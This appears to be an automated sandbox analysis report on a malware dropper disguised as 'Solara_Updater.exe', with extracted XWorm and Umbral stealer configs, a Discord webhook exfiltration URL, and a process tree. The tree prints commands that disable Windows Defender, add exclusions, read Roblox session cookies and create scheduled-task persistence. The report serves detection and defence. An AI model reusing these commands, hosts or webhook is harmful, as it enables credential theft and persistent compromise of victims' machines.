Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    19-05-2024 16:14

General

  • Target

    Solara_Updater.exe

  • Size

    1.9MB

  • MD5

    f4cffd7e6cca2b88bba1f19120e9255f

  • SHA1

    28df62794d325206d1f61a400b5c5c682632e371

  • SHA256

    4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

  • SHA512

    cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8

  • SSDEEP

    49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i

Malware Config

Extracted

Family

xworm

C2

answer-riverside.gl.at.ply.gg:45691

Attributes
  • Install_directory

    %AppData%

  • install_file

    svhost.exe

Extracted

Family

umbral

C2

https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V

Signatures

  • Detect Umbral payload 4 IoCs
  • Detect Xworm Payload 5 IoCs
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 13 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 19 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3012
      • C:\Users\Admin\AppData\Local\Temp\XClient.exe
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:1808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2356
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1888
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
          4⤵
          • Creates scheduled task(s)
          PID:2076
      • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1076
        • C:\Windows\system32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
          4⤵
          • Views/modifies file attributes
          PID:976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2628
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
            PID:2552
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:2528
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2712
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2900
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
              4⤵
                PID:976
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  5⤵
                  • Runs ping.exe
                  PID:2324
          • C:\Users\Admin\AppData\Local\Temp\sol.exe
            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2000
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
              3⤵
                PID:2604
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                  4⤵
                  • Loads dropped DLL
                  PID:2628
                  • C:\hostNet\bridgeblockportComBroker.exe
                    "C:\hostNet/bridgeblockportComBroker.exe"
                    5⤵
                    • Modifies WinLogon for persistence
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2676
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wr50u5fg\wr50u5fg.cmdline"
                      6⤵
                        PID:1524
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D4B.tmp" "c:\Users\Admin\AppData\Roaming\CSCB45058D06F694B8593882A1D59855C26.TMP"
                          7⤵
                            PID:1484
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\noo5nlwe\noo5nlwe.cmdline"
                          6⤵
                          • Drops file in System32 directory
                          PID:2064
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D89.tmp" "c:\Windows\System32\CSCF6C8047328354985AF527578961D7E65.TMP"
                            7⤵
                              PID:940
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GP6pjYPh8x.bat"
                            6⤵
                              PID:1684
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                7⤵
                                  PID:1588
                                • C:\Windows\system32\PING.EXE
                                  ping -n 10 localhost
                                  7⤵
                                  • Runs ping.exe
                                  PID:2608
                                • C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe
                                  "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2076
                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2432
                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:2696
                        • C:\Users\Admin\AppData\Local\Temp\sol.exe
                          "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2556
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                            4⤵
                              PID:760
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                5⤵
                                • Loads dropped DLL
                                PID:1288
                                • C:\hostNet\bridgeblockportComBroker.exe
                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2588
                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2904
                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2756
                              • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2952
                              • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:1488
                            • C:\Users\Admin\AppData\Local\Temp\sol.exe
                              "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2804
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                5⤵
                                  PID:2412
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                    6⤵
                                    • Loads dropped DLL
                                    PID:1744
                                    • C:\hostNet\bridgeblockportComBroker.exe
                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:1220
                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1256
                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2328
                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:1832
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                    6⤵
                                      PID:1216
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                        7⤵
                                        • Loads dropped DLL
                                        PID:1560
                                        • C:\hostNet\bridgeblockportComBroker.exe
                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1848
                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                    5⤵
                                      PID:1984
                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2308
                                        • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                          "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1556
                                        • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                          7⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1996
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" csproduct get uuid
                                            8⤵
                                              PID:2824
                                            • C:\Windows\system32\attrib.exe
                                              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:1500
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
                                              8⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1740
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                              8⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2528
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              8⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1232
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              8⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1508
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              "wmic.exe" os get Caption
                                              8⤵
                                                PID:2892
                                              • C:\Windows\System32\Wbem\wmic.exe
                                                "wmic.exe" computersystem get totalphysicalmemory
                                                8⤵
                                                  PID:2948
                                                • C:\Windows\System32\Wbem\wmic.exe
                                                  "wmic.exe" csproduct get uuid
                                                  8⤵
                                                    PID:1772
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    8⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2968
                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                    "wmic" path win32_VideoController get name
                                                    8⤵
                                                    • Detects videocard installed
                                                    PID:2608
                                                  • C:\Windows\system32\cmd.exe
                                                    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
                                                    8⤵
                                                      PID:2680
                                                      • C:\Windows\system32\PING.EXE
                                                        ping localhost
                                                        9⤵
                                                        • Runs ping.exe
                                                        PID:1452
                                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:468
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                    7⤵
                                                      PID:1464
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                        8⤵
                                                        • Loads dropped DLL
                                                        PID:2916
                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:2192
                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                    6⤵
                                                      PID:1036
                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2152
                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:1844
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                          8⤵
                                                            PID:3020
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:848
                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:2244
                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                          7⤵
                                                            PID:2080
                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:2124
                                                              • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:664
                                                              • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                9⤵
                                                                • Drops file in Drivers directory
                                                                • Executes dropped EXE
                                                                PID:680
                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                  "wmic.exe" csproduct get uuid
                                                                  10⤵
                                                                    PID:2012
                                                                  • C:\Windows\system32\attrib.exe
                                                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                    10⤵
                                                                    • Views/modifies file attributes
                                                                    PID:2632
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
                                                                    10⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:2660
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                    10⤵
                                                                      PID:3004
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      10⤵
                                                                        PID:2032
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        10⤵
                                                                          PID:1840
                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                          "wmic.exe" os get Caption
                                                                          10⤵
                                                                            PID:1460
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            "wmic.exe" computersystem get totalphysicalmemory
                                                                            10⤵
                                                                              PID:2888
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              "wmic.exe" csproduct get uuid
                                                                              10⤵
                                                                                PID:2372
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                10⤵
                                                                                  PID:1452
                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                  "wmic" path win32_VideoController get name
                                                                                  10⤵
                                                                                  • Detects videocard installed
                                                                                  PID:1420
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
                                                                                  10⤵
                                                                                    PID:3012
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping localhost
                                                                                      11⤵
                                                                                      • Runs ping.exe
                                                                                      PID:1228
                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:2228
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                  9⤵
                                                                                    PID:832
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                      10⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:1452
                                                                                      • C:\hostNet\bridgeblockportComBroker.exe
                                                                                        "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                        11⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2376
                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                  8⤵
                                                                                    PID:1776
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2624
                                                                                    • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2488
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                        10⤵
                                                                                          PID:840
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                            11⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:2288
                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                              12⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2392
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                        9⤵
                                                                                          PID:524
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1220
                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2376
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                              11⤵
                                                                                                PID:1892
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                  12⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1960
                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                    13⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1508
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                              10⤵
                                                                                                PID:2052
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                  11⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2756
                                                                                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                  11⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2420
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                    12⤵
                                                                                                      PID:2576
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                        13⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:1476
                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                          14⤵
